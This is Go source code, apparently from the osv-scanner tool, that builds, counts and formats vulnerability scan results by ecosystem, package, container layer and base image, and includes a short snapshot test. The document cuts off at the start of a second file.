// the image OS, every layer, and the base image groups (stored in descending Index order).
type ImageInfo struct {
	OS            string
	AllLayers     []LayerInfo
	AllBaseImages []BaseImageGroupInfo
}

// LicenseSummary carries the license reporting settings and counts copied into a Result by buildResult.
type LicenseSummary struct {
	// Summary is true when the license config requests a summary.
	Summary bool
	// ShowViolations is true when the license config has a non-empty allowlist.
	ShowViolations bool
	LicenseCount   []models.LicenseCount
}

// PackageContainerInfo represents detailed layer tracing information about a package.
type PackageContainerInfo struct {
	// LayerIndex is set by processSource from the package's ImageOrigin.Index and stays at its
	// zero value when ImageOrigin is nil. populateResultWithImageMetadata uses it as an index
	// into the image's layer list.
	LayerIndex    int
	LayerInfo     LayerInfo
	BaseImageInfo BaseImageGroupInfo
}

// BaseImageGroupInfo describes one entry of the image metadata's base image list together with
// the layers and vulnerability counts attributed to it.
type BaseImageGroupInfo struct {
	// Index is the entry's position in the image metadata's base image list (see buildBaseImages).
	Index         int
	BaseImageInfo []models.BaseImageDetails
	// AllLayers holds the layers whose BaseImageIndex equals Index, sorted by layer Index.
	AllLayers []LayerInfo
	Count     VulnCount
}

// LayerInfo describes one image layer together with the vulnerability counts of the packages
// attributed to it.
type LayerInfo struct {
	// Index is the layer's position in the image metadata's layer list (see buildLayers).
	Index         int
	LayerMetadata models.LayerMetadata
	Count         VulnCount
}

// VulnTypeSummary represents the count of each vulnerability type at the top level
// of the scanning results.
type VulnTypeSummary struct {
	// All is OS + Project; Hidden is not included in it (see getVulnTypeSummary).
	All     int
	OS      int
	Project int
	Hidden  int
}

// VulnCount represents the counts of vulnerabilities by call analysis, severity and fixed/unfixed status
type VulnCount struct {
	AnalysisCount AnalysisCount
	// Only regular vulnerabilities are included in the severity and fixable counts.
	SeverityCount SeverityCount
	FixableCount  FixableCount
}

// SeverityCount represents the counts of vulnerabilities by severity level.
type SeverityCount struct {
	Critical int
	High     int
	Medium   int
	Low      int
	Unknown  int
}

// AnalysisCount represents the counts of vulnerabilities by analysis type (e.g. call analysis)
type AnalysisCount struct {
	Regular int
	Hidden  int
}

// FixableCount represents the counts of vulnerabilities by fixable status.
type FixableCount struct {
	Fixed   int
	UnFixed int
}

// VulnAnalysisType classifies a vulnerability group as regular, uncalled or unimportant;
// processVulnGroups assigns it and files the last two under the hidden vulnerabilities.
type VulnAnalysisType int

const (
	VulnTypeRegular     VulnAnalysisType = iota // 0
	VulnTypeUncalled                            // 1
	VulnTypeUnimportant                         // 2
)

// UnfixedDescription is the placeholder used in place of a fixed version when no fix is found.
const UnfixedDescription = "No fix available"

// VersionUnsupported is returned by getNextFixVersion when the installed version cannot be parsed.
const VersionUnsupported = "N/A"

// osEcosystems is a list of OS images.
var osEcosystems = []string{"Debian", "Alpine", "Ubuntu"}

// PrintResults encodes the structure produced by BuildResults as indented JSON on outputWriter.
// This function is for testing purposes only, to visualize the result format.
func PrintResults(vulnResult *models.VulnerabilityResults, outputWriter io.Writer) error {
	enc := json.NewEncoder(outputWriter)
	enc.SetIndent("", " ")

	built := BuildResults(vulnResult)

	//nolint:musttag
	return enc.Encode(built)
}

// BuildResults constructs the output result structure from the vulnerability results.
//
// The result is hierarchical: an overall summary, then ecosystems, sources, packages and
// finally the individual vulnerabilities. The other output formats (table, HTML, etc.)
// are generated from this structure.
//
// A source is left out of the result entirely, including every count, when any of its
// ExperimentalPES entries has MatchesAllVulns set together with the vex.ComponentNotPresent
// justification. Reviewers of a report should keep in mind that such sources do not appear at all.
func BuildResults(vulnResult *models.VulnerabilityResults) Result {
	sourcesByEcosystem := map[string][]SourceResult{}

	var (
		totalVulns      VulnCount
		deprecatedTotal int
	)

	for _, packageSource := range vulnResult.Results {
		componentAbsent := false
		for _, pes := range packageSource.ExperimentalPES {
			if pes.MatchesAllVulns && pes.Justification == vex.ComponentNotPresent {
				componentAbsent = true
				break
			}
		}
		if componentAbsent {
			continue
		}

		// One source can contribute to several ecosystems; fold each part into the totals.
		for ecosystem, source := range processSource(packageSource) {
			sourcesByEcosystem[ecosystem] = append(sourcesByEcosystem[ecosystem], source)
			totalVulns.Add(source.VulnCount)
			deprecatedTotal += source.PkgDeprecatedCount
		}
	}

	return buildResult(
		sourcesByEcosystem,
		totalVulns,
		vulnResult.ImageMetadata,
		vulnResult.ExperimentalAnalysisConfig.Licenses,
		vulnResult.LicenseSummary,
		deprecatedTotal,
	)
}

// buildResult builds the final Result object from the ecosystem map and total vulnerability count.
func buildResult(ecosystemMap map[string][]SourceResult, resultCount VulnCount, imageMetadata *models.ImageMetadata, licenseConfig models.ExperimentalLicenseConfig, licenseCount []models.LicenseCount, pkgDeprecatedCount int) Result {
	// Split the ecosystems into project and OS groups so they can be ordered separately.
	var projectGroup, osGroup []EcosystemResult
	for name, sources := range ecosystemMap {
		entry := EcosystemResult{
			Name:    name,
			Sources: sources,
			IsOS:    isOSEcosystem(name),
		}
		if entry.IsOS {
			osGroup = append(osGroup, entry)
		} else {
			projectGroup = append(projectGroup, entry)
		}
	}

	// Map iteration order is random, so both groups are sorted by name for stable output.
	byName := func(a, b EcosystemResult) int {
		return cmp.Compare(a.Name, b.Name)
	}
	slices.SortFunc(projectGroup, byName)
	slices.SortFunc(osGroup, byName)

	// Project results come before OS results.
	ordered := append(projectGroup, osGroup...)

	result := Result{
		Ecosystems:         ordered,
		VulnTypeSummary:    getVulnTypeSummary(ordered),
		PackageTypeCount:   getPackageTypeCount(ordered),
		VulnCount:          resultCount,
		PkgDeprecatedCount: pkgDeprecatedCount,
	}

	if imageMetadata != nil {
		populateResultWithImageMetadata(&result, *imageMetadata)
	}

	if licenseConfig.Summary {
		result.LicenseSummary = LicenseSummary{
			Summary:      true,
			LicenseCount: licenseCount,
		}
	}

	// Violations are shown whenever an allowlist is configured, with or without the summary.
	if len(licenseConfig.Allowlist) != 0 {
		result.LicenseSummary.ShowViolations = true
	}

	return result
}

// populateResultWithImageMetadata modifies the result by adding image metadata to it.
// It takes a pointer (*Result) so that the caller's result is modified in place.
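func populateResultWithImageMetadata(result *Result, imageMetadata models.ImageMetadata) {
	allLayers := buildLayers(imageMetadata.LayerMetadata)
	allBaseImages := buildBaseImages(imageMetadata.BaseImages)
	layerCount := make([]VulnCount, len(allLayers))
	baseImageCount := make([]VulnCount, len(allBaseImages))

	// Both indexes below come from scan data: LayerIndex defaults to 0 for packages without an
	// ImageOrigin, and the metadata may carry no layers at all (the len(allLayers) check at the
	// end allows for that). Indexing without a range check would panic and abort the whole
	// report, so out-of-range entries are left unattributed instead.
	hasLayer := func(i int) bool { return i >= 0 && i < len(allLayers) }
	hasBaseImage := func(i int) bool { return i >= 0 && i < len(allBaseImages) }

	// Calculate total vulns for each layer and base image.
	for _, ecosystem := range result.Ecosystems {
		for _, source := range ecosystem.Sources {
			for _, pkg := range source.Packages {
				layerIndex := pkg.LayerDetail.LayerIndex
				if !hasLayer(layerIndex) {
					continue
				}
				layerCount[layerIndex].Add(pkg.VulnCount)

				baseImageIndex := allLayers[layerIndex].LayerMetadata.BaseImageIndex
				if hasBaseImage(baseImageIndex) {
					baseImageCount[baseImageIndex].Add(pkg.VulnCount)
				}
			}
		}
	}

	// Update vuln count for layers and group the layers by the base image they belong to.
	baseImageMap := make(map[int][]LayerInfo)
	for i := range allLayers {
		allLayers[i].Count = layerCount[i]
		baseImageIndex := allLayers[i].LayerMetadata.BaseImageIndex
		baseImageMap[baseImageIndex] = append(baseImageMap[baseImageIndex], allLayers[i])
	}

	for i := range allBaseImages {
		allBaseImages[i].Count = baseImageCount[i]
		slices.SortFunc(baseImageMap[i], func(a, b LayerInfo) int {
			return cmp.Compare(a.Index, b.Index)
		})
		allBaseImages[i].AllLayers = baseImageMap[i]
	}

	// Fill up Layer info for each package
	for i := range result.Ecosystems {
		for j := range result.Ecosystems[i].Sources {
			for k := range result.Ecosystems[i].Sources[j].Packages {
				// Pointer to packageInfo to modify directly.
				packageInfo := &result.Ecosystems[i].Sources[j].Packages[k]

				layerIndex := packageInfo.LayerDetail.LayerIndex
				if !hasLayer(layerIndex) {
					// No matching layer: LayerInfo and BaseImageInfo keep their zero values.
					continue
				}
				packageInfo.LayerDetail.LayerInfo = allLayers[layerIndex]

				baseImageIndex := allLayers[layerIndex].LayerMetadata.BaseImageIndex
				if hasBaseImage(baseImageIndex) {
					packageInfo.LayerDetail.BaseImageInfo = allBaseImages[baseImageIndex]
				}
			}
		}
	}

	// Display base images in a reverse order
	slices.SortFunc(allBaseImages, func(a, b BaseImageGroupInfo) int {
		return cmp.Compare(b.Index, a.Index)
	})

	result.ImageInfo = ImageInfo{
		OS:            imageMetadata.OS,
		AllLayers:     allLayers,
		AllBaseImages: allBaseImages,
	}

	if len(allLayers) != 0 {
		result.IsContainerScanning = true
	}
}

// buildBaseImages wraps each entry of baseImages in a BaseImageGroupInfo whose Index is the
// entry's position in the input slice. Layers and counts are filled in by the caller.
func buildBaseImages(baseImages [][]models.BaseImageDetails) []BaseImageGroupInfo {
	allBaseImages := make([]BaseImageGroupInfo, len(baseImages))
	for i, baseImage := range baseImages {
		allBaseImages[i] = BaseImageGroupInfo{
			Index:         i,
			BaseImageInfo: baseImage,
		}
	}

	return allBaseImages
}

// buildLayers wraps each layer's metadata in a LayerInfo whose Index is the layer's position
// in the input slice. Counts are filled in by the caller.
func buildLayers(layerMetadata []models.LayerMetadata) []LayerInfo {
	allLayers := make([]LayerInfo, len(layerMetadata))
	for i, layer := range layerMetadata {
		allLayers[i] = LayerInfo{
			Index:         i,
			LayerMetadata: layer,
		}
	}

	return allLayers
}

// processSource processes a single source (lockfile or artifact) and returns a map of ecosystems to their corresponding SourceResults.
//
// Packages are assigned to a SourceResult by exact ecosystem match. Matching on a key prefix
// would let a package of ecosystem "A:1:LTS" also be counted under "A:1", and would put every
// package under an empty ecosystem name, inflating the per-ecosystem counts.
func processSource(packageSource models.PackageSource) map[string]SourceResult {
	// Handle potential duplicate source packages with different OS package names.
	// This map ensures each package is processed only once,
	// with subsequent occurrences only adding their OSPackageName to the list.
	packageMap := make(map[string]PackageResult)
	// packageEcosystem records, for every key of packageMap, the ecosystem the package belongs to.
	packageEcosystem := make(map[string]string)

	// Use a map because one source can contain packages from multiple ecosystems.
	sourceResults := make(map[string]SourceResult)

	// If no packages with issues are found, mark the ecosystem as empty.
	if len(packageSource.Packages) == 0 {
		sourceResults[""] = SourceResult{
			Name:     packageSource.Source.String(),
			Type:     packageSource.Source.Type,
			Packages: []PackageResult{},
		}

		return sourceResults
	}

	for _, vulnPkg := range packageSource.Packages {
		ecosystem := vulnPkg.Package.Ecosystem
		if _, exists := sourceResults[ecosystem]; !exists {
			sourceResults[ecosystem] = SourceResult{
				Name: packageSource.Source.String(),
				Type: packageSource.Source.Type,
			}
		}

		// Use a unique identifier (ecosystem + package name + version) to deduplicate packages (same version),
		// ensuring each is processed only once.
		key := ecosystem + ":" + vulnPkg.Package.Name + ":" + vulnPkg.Package.Version
		if existing, seen := packageMap[key]; seen {
			existing.OSPackageNames = append(existing.OSPackageNames, vulnPkg.Package.OSPackageName)
			packageMap[key] = existing

			continue // Skip processing this vulnPkg as it was already added
		}

		packageResult := processPackage(vulnPkg)
		if vulnPkg.Package.ImageOrigin != nil {
			packageResult.LayerDetail = PackageContainerInfo{
				LayerIndex: vulnPkg.Package.ImageOrigin.Index,
			}
		}

		packageMap[key] = packageResult
		packageEcosystem[key] = ecosystem
	}

	for ecosystem, sourceResult := range sourceResults {
		var packages []PackageResult
		for key, pkg := range packageMap {
			if packageEcosystem[key] != ecosystem {
				continue
			}

			packages = append(packages, pkg)
			sourceResult.VulnCount.Add(pkg.VulnCount)
			sourceResult.LicenseViolationsCount += len(pkg.LicenseViolations)

			if len(pkg.RegularVulns) != 0 {
				sourceResult.PackageTypeCount.Regular += 1
			}
			// A package can be counted as both regular and hidden if it has both called and uncalled vulnerabilities.
			if len(pkg.HiddenVulns) != 0 {
				sourceResult.PackageTypeCount.Hidden += 1
			}
			if pkg.Deprecated {
				sourceResult.PkgDeprecatedCount += 1
			}
		}

		// Sort packageResults to ensure consistent output
		slices.SortFunc(packages, func(a, b PackageResult) int {
			return cmp.Or(
				cmp.Compare(a.Name, b.Name),
				cmp.Compare(a.InstalledVersion, b.InstalledVersion),
				cmp.Compare(a.Commit, b.Commit),
			)
		})

		sourceResult.Packages = packages
		sourceResults[ecosystem] = sourceResult
	}

	return sourceResults
}

// processPackage processes vulnerability information for a given package
// and generates a structured output result.
//
// It splits the package's vulnerability groups into regular and hidden ones, fills in the
// description and fix information of each, and assembles the PackageResult together with the
// counts and the package-level fixed version. Layer information is not set here; processSource
// adds it afterwards when the package has an image origin.
func processPackage(vulnPkg models.PackageVulns) PackageResult {
	regularVulnMap, hiddenVulnMap := processVulnGroups(vulnPkg)
	updateVuln(regularVulnMap, vulnPkg)
	updateVuln(hiddenVulnMap, vulnPkg)

	regularVulnList := getVulnList(regularVulnMap)
	hiddenVulnList := getVulnList(hiddenVulnMap)

	return PackageResult{
		Name:             vulnPkg.Package.Name,
		OSPackageNames:   []string{vulnPkg.Package.OSPackageName},
		InstalledVersion: vulnPkg.Package.Version,
		Commit:           vulnPkg.Package.Commit,
		// Only regular vulnerabilities take part in the package-level fixed version.
		FixedVersion:      calculatePackageFixedVersion(vulnPkg.Package.Ecosystem, regularVulnList),
		RegularVulns:      regularVulnList,
		HiddenVulns:       hiddenVulnList,
		VulnCount:         calculateCount(regularVulnList, hiddenVulnList),
		Licenses:          vulnPkg.Licenses,
		LicenseViolations: vulnPkg.LicenseViolations,
		DepGroups:         vulnPkg.DepGroups,
		Deprecated:        vulnPkg.Package.Deprecated,
	}
}

// processVulnGroups processes vulnerability groups within a package.
//
// Returns:
//
//	regularVulnMap: A map of regular vulnerabilities, keyed by their representative ID.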
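//	hiddenVulnMap: A map of hidden (unimportant or uncalled) vulnerabilities, keyed by their representative ID.
//
// The representative ID of a group is its first ID. A group without any ID is skipped, because
// there is nothing to key it by and indexing the empty list would panic.
func processVulnGroups(vulnPkg models.PackageVulns) (map[string]VulnResult, map[string]VulnResult) {
	regularVulnMap := make(map[string]VulnResult)
	hiddenVulnMap := make(map[string]VulnResult)

	for _, group := range vulnPkg.Groups {
		if len(group.IDs) == 0 {
			continue
		}
		representID := group.IDs[0]

		// Aliases are listed only when the representative ID is itself one of the group's
		// aliases; the representative ID is then left out of the list. The slice stays nil
		// when there is nothing to list.
		var aliases []string
		if slices.Contains(group.Aliases, representID) {
			for _, alias := range group.Aliases {
				if alias != representID {
					aliases = append(aliases, alias)
				}
			}
		}

		vuln := VulnResult{
			ID:            representID,
			GroupIDs:      group.IDs,
			Aliases:       aliases,
			SeverityScore: group.MaxSeverity,
		}

		// The error is not inspected: an unknown rating is handled right below by showing
		// "N/A" instead of the raw score.
		vuln.SeverityRating, _ = severity.CalculateRating(vuln.SeverityScore)
		if vuln.SeverityRating == severity.UnknownRating {
			vuln.SeverityScore = "N/A"
		}

		// "Unimportant" takes precedence over "uncalled"; everything else is regular.
		switch {
		case group.IsGroupUnimportant():
			vuln.VulnAnalysisType = VulnTypeUnimportant
			hiddenVulnMap[representID] = vuln
		case !group.IsCalled():
			vuln.VulnAnalysisType = VulnTypeUncalled
			hiddenVulnMap[representID] = vuln
		default:
			vuln.VulnAnalysisType = VulnTypeRegular
			regularVulnMap[representID] = vuln
		}
	}

	return regularVulnMap, hiddenVulnMap
}

// updateVuln updates each vulnerability info in vulnMap from the details of vulnPkg.Vulnerabilities.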
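func updateVuln(vulnMap map[string]VulnResult, vulnPkg models.PackageVulns) {
	for _, vuln := range vulnPkg.Vulnerabilities {
		id := vuln.GetId()

		// Only IDs already present in vulnMap are updated; the fix lookup is skipped for the rest.
		outputVuln, exist := vulnMap[id]
		if !exist {
			continue
		}

		outputVuln.IsFixable, outputVuln.FixedVersion = getNextFixVersion(vuln.GetAffected(), vulnPkg.Package.Version, vulnPkg.Package.Name, vulnPkg.Package.Ecosystem)

		// Prefer the summary and fall back to the details when there is none.
		outputVuln.Description = vuln.GetSummary()
		if outputVuln.Description == "" {
			outputVuln.Description = vuln.GetDetails()
		}

		vulnMap[id] = outputVuln
	}
}

// getVulnList returns the values of vulnMap as a slice ordered by identifiers.IDSortFunc.
func getVulnList(vulnMap map[string]VulnResult) []VulnResult {
	vulnList := make([]VulnResult, 0, len(vulnMap))
	for _, vuln := range vulnMap {
		vulnList = append(vulnList, vuln)
	}

	// Sort the vulnerabilities by ID to ensure consistent output
	slices.SortFunc(vulnList, func(a, b VulnResult) int {
		return identifiers.IDSortFunc(a.ID, b.ID)
	})

	return vulnList
}

// getNextFixVersion finds the next fixed version for a given vulnerability.
// returns a boolean value indicating whether a fixed version is available.
//
// The result is the lowest "fixed" event version that is not below the installed version, taken
// from the affected entries matching the package name and ecosystem. It returns
// (false, VersionUnsupported) when the installed version cannot be parsed and
// (false, UnfixedDescription) when no usable fix event exists.
//
// Fixed versions come from advisory data, so a version that cannot be parsed or compared is
// skipped rather than passed to semantic.MustParse, which presumably panics on invalid input.
func getNextFixVersion(allAffected []*osvschema.Affected, installedVersion string, installedPackage string, ecosystem string) (bool, string) {
	ecosystemPrefix := strings.Split(ecosystem, ":")[0]

	installed, err := semantic.Parse(installedVersion, ecosystemPrefix)
	if err != nil {
		return false, VersionUnsupported
	}

	minFixVersion := UnfixedDescription
	for _, affected := range allAffected {
		// NOTE(review): only the advisory's ecosystem goes through removeVariants; if the installed
		// ecosystem can carry an ":LTS" or ":Pro" suffix this comparison never matches. Confirm
		// against the callers.
		if affected.GetPackage().GetName() != installedPackage || removeVariants(affected.GetPackage().GetEcosystem()) != ecosystem {
			continue
		}

		for _, affectedRange := range affected.GetRanges() {
			for _, affectedEvent := range affectedRange.GetEvents() {
				fixed := affectedEvent.GetFixed()
				// Skip if it's not a fix version event.
				if fixed == "" {
					continue
				}

				candidate, err := semantic.Parse(fixed, ecosystemPrefix)
				if err != nil {
					continue
				}

				// Skip if the installed version is greater than the fix version.
				if order, err := installed.CompareStr(fixed); err != nil || order > 0 {
					continue
				}

				// Find the minimum fix version
				if minFixVersion != UnfixedDescription {
					if order, err := candidate.CompareStr(minFixVersion); err != nil || order >= 0 {
						continue
					}
				}
				minFixVersion = fixed
			}
		}
	}

	hasFixedVersion := minFixVersion != UnfixedDescription // Check if a fix is found

	return hasFixedVersion, minFixVersion
}

// calculatePackageFixedVersion returns the highest fixed version among the fixable vulnerabilities
// in allVulns, or UnfixedDescription when none of them has a usable fixed version.
func calculatePackageFixedVersion(ecosystem string, allVulns []VulnResult) string {
	ecosystemPrefix := strings.Split(ecosystem, ":")[0]

	maxFixVersion := ""
	var maxParsed semantic.Version

	for _, vuln := range allVulns {
		// Skip vulnerabilities without a fixed version.
		if !vuln.IsFixable {
			continue
		}

		// Once a maximum exists, keep it unless this fixed version is strictly higher.
		if maxFixVersion != "" {
			if order, err := maxParsed.CompareStr(vuln.FixedVersion); err != nil || order >= 0 {
				continue
			}
		}

		// A fixable vulnerability is expected to carry a parsable fixed version; one that
		// does not parse is skipped instead of panicking in semantic.MustParse.
		parsed, err := semantic.Parse(vuln.FixedVersion, ecosystemPrefix)
		if err != nil {
			continue
		}
		maxFixVersion, maxParsed = vuln.FixedVersion, parsed
	}

	// Default to UnfixedDescription if no fix version is found.
	if maxFixVersion == "" {
		maxFixVersion = UnfixedDescription
	}

	return maxFixVersion
}

// Add adds the counts from another VulnCount to the receiver.
func (v *VulnCount) Add(other VulnCount) {
	v.SeverityCount.Add(other.SeverityCount)
	v.AnalysisCount.Add(other.AnalysisCount)
	v.FixableCount.Add(other.FixableCount)
}

// Add adds the counts from another SeverityCount to the receiver.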
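func (c *SeverityCount) Add(other SeverityCount) {
	c.Critical += other.Critical
	c.High += other.High
	c.Medium += other.Medium
	c.Low += other.Low
	c.Unknown += other.Unknown
}

// Add adds the counts from another AnalysisCount to the receiver.
func (c *AnalysisCount) Add(other AnalysisCount) {
	c.Regular += other.Regular
	c.Hidden += other.Hidden
}

// Add adds the counts from another FixableCount to the receiver.
func (c *FixableCount) Add(other FixableCount) {
	c.Fixed += other.Fixed
	c.UnFixed += other.UnFixed
}

// String returns the display name of the analysis type, or "Unknown" for any other value.
func (vt VulnAnalysisType) String() string {
	switch vt {
	case VulnTypeRegular:
		return "Regular"
	case VulnTypeUncalled:
		return "Uncalled"
	case VulnTypeUnimportant:
		return "Unimportant"
	default:
		return "Unknown"
	}
}

// getFilteredVulnReasons returns the distinct non-regular analysis types found in vulns,
// sorted alphabetically and joined with ", ".
func getFilteredVulnReasons(vulns []VulnResult) string {
	seen := make(map[string]bool)
	for _, vuln := range vulns {
		if vuln.VulnAnalysisType == VulnTypeRegular {
			continue
		}
		seen[vuln.VulnAnalysisType.String()] = true
	}

	reasons := make([]string, 0, len(seen))
	for reason := range seen {
		reasons = append(reasons, reason)
	}
	sort.Strings(reasons)

	return strings.Join(reasons, ", ")
}

// getBaseImageName returns the name of the first base image detail in the group, or "" when
// the group has none.
func getBaseImageName(baseImageInfo BaseImageGroupInfo) string {
	if len(baseImageInfo.BaseImageInfo) == 0 {
		return ""
	}

	return baseImageInfo.BaseImageInfo[0].Name
}

// increaseSeverityCount returns severityCount with the bucket for severityType incremented.
// The argument is passed by value, so the caller must use the returned count. A rating outside
// the five listed ones leaves the counts unchanged.
func increaseSeverityCount(severityCount SeverityCount, severityType severity.Rating) SeverityCount {
	switch severityType {
	case severity.CriticalRating:
		severityCount.Critical += 1
	case severity.HighRating:
		severityCount.High += 1
	case severity.MediumRating:
		severityCount.Medium += 1
	case severity.LowRating:
		severityCount.Low += 1
	case severity.UnknownRating:
		severityCount.Unknown += 1
	}

	return severityCount
}

// isOSEcosystem reports whether ecosystem starts with one of the names in osEcosystems.
func isOSEcosystem(ecosystem string) bool {
	return slices.ContainsFunc(osEcosystems, func(image string) bool {
		return strings.HasPrefix(ecosystem, image)
	})
}

// getVulnTypeSummary totals the regular vulnerabilities per kind of ecosystem (OS or project)
// and the hidden vulnerabilities overall. All is OS + Project and does not include Hidden.
func getVulnTypeSummary(result []EcosystemResult) VulnTypeSummary {
	var summary VulnTypeSummary
	for _, ecosystem := range result {
		for _, source := range ecosystem.Sources {
			counts := source.VulnCount.AnalysisCount
			if ecosystem.IsOS {
				summary.OS += counts.Regular
			} else {
				summary.Project += counts.Regular
			}
			summary.Hidden += counts.Hidden
		}
	}
	summary.All = summary.OS + summary.Project

	return summary
}

// getPackageTypeCount sums the per-source package counts (regular and hidden) over all ecosystems.
func getPackageTypeCount(result []EcosystemResult) AnalysisCount {
	var total AnalysisCount
	for _, ecosystem := range result {
		for _, source := range ecosystem.Sources {
			total.Add(source.PackageTypeCount)
		}
	}

	return total
}

// calculateCount calculates the vulnerability counts based on the provided
// lists of regular and hidden vulnerabilities.
// Severity and fixable counts cover the regular vulnerabilities only.
func calculateCount(regularVulnList, hiddenVulnList []VulnResult) VulnCount {
	count := VulnCount{
		AnalysisCount: AnalysisCount{
			Regular: len(regularVulnList),
			Hidden:  len(hiddenVulnList),
		},
	}

	for _, vuln := range regularVulnList {
		if vuln.IsFixable {
			count.FixableCount.Fixed += 1
		} else {
			count.FixableCount.UnFixed += 1
		}
		count.SeverityCount = increaseSeverityCount(count.SeverityCount, vuln.SeverityRating)
	}

	return count
}

// formatLayerCommand formats the layer command output for better readability.
// It replaces every "dir:<hex>" or "file:<hex>" ID with "dir:UNKNOWN" or "file:UNKNOWN"
// respectively and returns the first such ID separately as "File ID: <hex>".
//
// Each reference keeps its own prefix; reusing the prefix of the first match for all
// replacements would relabel a "file:" reference as "dir:" (or the reverse) in a command that
// contains both kinds.
//
// The result always has two elements: the formatted command and the ID line ("" when the
// command contains no such ID).
func formatLayerCommand(command string) []string {
	command = cleanupSpaces(command)

	re := cachedregexp.MustCompile(`(dir|file):([a-f0-9]+)`)
	match := re.FindStringSubmatch(command)
	if len(match) <= 2 {
		return []string{command, ""}
	}

	hash := match[2] // Capture the hash ID of the first match
	// ${1} expands to the prefix ("dir" or "file") captured by each individual match.
	newCommand := re.ReplaceAllString(command, "${1}:UNKNOWN")

	return []string{newCommand, "File ID: " + hash}
}

// cleanupSpaces uses a regular expression to replace multiple spaces with a single space.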
func cleanupSpaces(s string) string {
	whitespaceRun := cachedregexp.MustCompile(`\s+`)

	// Collapse every whitespace run to one space, then drop leading and trailing whitespace.
	return strings.TrimSpace(whitespaceRun.ReplaceAllString(s, " "))
}

// printSummary writes the two-sentence totals summary (affected packages, known vulnerabilities
// by severity, ecosystems, fixable vulnerabilities) to out, followed by a newline.
func printSummary(result Result, out io.Writer) {
	severities := result.VulnCount.SeverityCount
	fixedCount := result.VulnCount.FixableCount.Fixed
	ecosystemCount := len(result.Ecosystems)

	// Singular or plural nouns, chosen by Form from the respective counts.
	packageForm := Form(result.PackageTypeCount.Regular, "package", "packages")
	vulnerabilityForm := Form(result.VulnTypeSummary.All, "vulnerability", "vulnerabilities")
	fixedVulnForm := Form(fixedCount, "vulnerability", "vulnerabilities")
	ecosystemForm := Form(ecosystemCount, "ecosystem", "ecosystems")

	summary := fmt.Sprintf(
		"Total %[1]d %[10]s affected by %[2]d known %[11]s (%[3]s, %[4]s, %[5]s, %[6]s, %[7]s) from %[8]s.\n"+
			"%[9]d %[12]s can be fixed.\n",
		result.PackageTypeCount.Regular,
		result.VulnTypeSummary.All,
		text.FgRed.Sprintf("%d Critical", severities.Critical),
		text.FgHiYellow.Sprintf("%d High", severities.High),
		text.FgYellow.Sprintf("%d Medium", severities.Medium),
		text.FgHiCyan.Sprintf("%d Low", severities.Low),
		text.FgCyan.Sprintf("%d Unknown", severities.Unknown),
		text.FgGreen.Sprintf("%d %s", ecosystemCount, ecosystemForm),
		fixedCount,
		packageForm,
		vulnerabilityForm,
		fixedVulnForm,
	)
	fmt.Fprintln(out, summary)
}

// printPkgDeprecatedSummary writes the total number of deprecated packages to out.
func printPkgDeprecatedSummary(result Result, out io.Writer) {
	noun := Form(result.PkgDeprecatedCount, "package", "packages")
	fmt.Fprintln(out, fmt.Sprintf("Total %d %s deprecated.\n", result.PkgDeprecatedCount, noun))
}

// getInstalledVersionOrCommit returns the installed version, or the shortened commit when the
// package has no version but does have a commit.
func getInstalledVersionOrCommit(pkg PackageResult) string {
	if pkg.InstalledVersion != "" || pkg.Commit == "" {
		return pkg.InstalledVersion
	}

	return results.GetShortCommit(pkg.Commit)
}

// isOSResult reports whether sourceType is the OS package source type.
func isOSResult(sourceType models.SourceType) bool {
	return sourceType == models.SourceTypeOSPackage
}

// containsOSResult reports whether any source in result is an OS package source.
func containsOSResult(result Result) bool {
	for i := range result.Ecosystems {
		for j := range result.Ecosystems[i].Sources {
			if isOSResult(result.Ecosystems[i].Sources[j].Type) {
				return true
			}
		}
	}

	return false
}

// ecosystemHasRegVuln reports whether any source of the ecosystem has at least one package
// with regular vulnerabilities.
func ecosystemHasRegVuln(ecosystem EcosystemResult) bool {
	for i := range ecosystem.Sources {
		if ecosystem.Sources[i].PackageTypeCount.Regular > 0 {
			return true
		}
	}

	return false
}

// removeVariants strips the ":Pro" and ":LTS" markers from ecosystem names containing "Ubuntu";
// any other ecosystem name is returned unchanged.
func removeVariants(ecosystem string) string {
	if !strings.Contains(ecosystem, "Ubuntu") {
		return ecosystem
	}

	withoutPro := strings.ReplaceAll(ecosystem, ":Pro", "")

	return strings.ReplaceAll(withoutPro, ":LTS", "")
}

// formatHiddenVulnsPrompt returns the hint shown when hiddenVulns vulnerabilities are hidden.
func formatHiddenVulnsPrompt(hiddenVulns int) string {
	const prompt = "Hiding %d number of vulnerabilities deemed unimportant, use --all-vulns to show them."

	return fmt.Sprintf(prompt, hiddenVulns)
}

// GetContainerScanningHeader returns the header line for a container scan, naming the image OS
// and, when it has a name, the base image group whose Index is 1. It returns "" when result is
// not a container scanning result.
func GetContainerScanningHeader(result Result) string {
	if !result.IsContainerScanning {
		return ""
	}

	header := fmt.Sprintf("Container Scanning Result (%s)", result.ImageInfo.OS)

	// Only the first group with Index 1 is considered.
	baseImageName := ""
	for _, baseImage := range result.ImageInfo.AllBaseImages {
		if baseImage.Index != 1 {
			continue
		}
		baseImageName = getBaseImageName(baseImage)

		break
	}

	if baseImageName == "" {
		return header
	}

	return header + fmt.Sprintf(" (Based on \"%s\" image)", baseImageName)
}

================================================
FILE: internal/output/output_result_test.go
================================================
package output_test

import (
	"bytes"
	"testing"

	"github.com/google/osv-scanner/v2/internal/output"
	"github.com/google/osv-scanner/v2/internal/testutility"
)

// Snapshot test: JSON rendering of the built output result for results containing vulnerabilities.
func TestPrintOutputResults_WithVulnerabilities(t *testing.T) {
	t.Parallel()

	testOutputWithVulnerabilities(t, func(t *testing.T, args outputTestCaseArgs) {
		t.Helper()

		var buf bytes.Buffer
		if err := output.PrintResults(args.vulnResult, &buf); err != nil {
			t.Errorf("Error writing output: %s", err)
		}

		testutility.NewSnapshot().MatchText(t, buf.String())
	})
}

================================================
FILE: internal/output/result.go
================================================
package output

import (
	"encoding/json"
	"fmt"
	"log"
	"maps"
	"os"
	"slices"
	"strings"
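"github.com/google/osv-scanner/v2/internal/identifiers" "github.com/google/osv-scanner/v2/internal/utility/vulns" "github.com/google/osv-scanner/v2/pkg/models" "github.com/ossf/osv-schema/bindings/go/osvschema" "google.golang.org/protobuf/encoding/protojson" )

// pkgWithSource pairs a package with the source it was found in.
// It is used as the key type of pkgSourceSet.
type pkgWithSource struct {
	Package models.PackageInfo `json:"Package"`
	Source  models.SourceInfo  `json:"Source"`
}

// Custom implementation of this unique set map to allow it to serialize to JSON
type pkgSourceSet map[pkgWithSource]struct{}

// StableKeys returns the pkgWithSource keys ordered by source path, then
// package name, then package version.
//
// NOTE(review): keys that agree on all three fields (for example two entries
// that differ only in Package.Commit) compare equal, so their relative order
// still follows map iteration order.
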